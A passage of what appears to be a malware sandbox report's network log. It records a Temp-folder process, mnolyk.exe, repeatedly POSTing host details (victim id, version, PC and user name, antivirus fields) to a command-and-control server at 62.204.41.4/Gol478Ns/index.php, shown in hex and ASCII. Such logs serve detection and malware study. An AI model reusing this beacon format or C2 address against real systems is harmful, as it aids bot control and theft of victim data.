                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:31.406632900 CET273INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          147192.168.2.64986862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:31.598757029 CET274OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:31.661962032 CET274INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          148192.168.2.64986962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:31.842864037 CET275OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:31.907516003 CET275INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          149192.168.2.64987062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:32.078335047 CET275OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:32.142682076 CET276INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          15192.168.2.64973362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:54.497422934 CET120OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:54.562045097 CET120INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          150192.168.2.64987162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:32.342194080 CET276OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:32.405644894 CET277INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          151192.168.2.64987262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:32.599241018 CET277OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:32.663626909 CET278INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          152192.168.2.64987362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:32.847820044 CET278OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:32.911439896 CET279INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          153192.168.2.64987462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:33.109252930 CET279OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:33.173959970 CET280INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          154192.168.2.64987562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:33.341459990 CET281OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:33.405076027 CET281INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          155192.168.2.64987662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:33.586090088 CET282OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:33.649971008 CET282INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          156192.168.2.64987762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:33.832947016 CET283OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:33.894639015 CET283INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          157192.168.2.64987862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:34.080303907 CET284OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:34.146358967 CET284INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          158192.168.2.64987962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:34.335803986 CET285OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:34.399455070 CET285INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          159192.168.2.64988162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:34.599060059 CET286OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:34.663373947 CET292INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          16192.168.2.64973462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:54.737090111 CET121OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:54.802834034 CET121INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          160192.168.2.64988262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:34.875626087 CET293OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:34.938281059 CET294INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          161192.168.2.64988362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:35.109836102 CET294OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:35.175904036 CET295INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          162192.168.2.64988462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:35.347764015 CET295OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:35.413851976 CET296INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          163192.168.2.64988562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:35.593496084 CET296OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:35.655714989 CET297INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          164192.168.2.64988662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:35.832637072 CET297OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:35.894501925 CET298INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          165192.168.2.64988762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:36.097176075 CET298OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
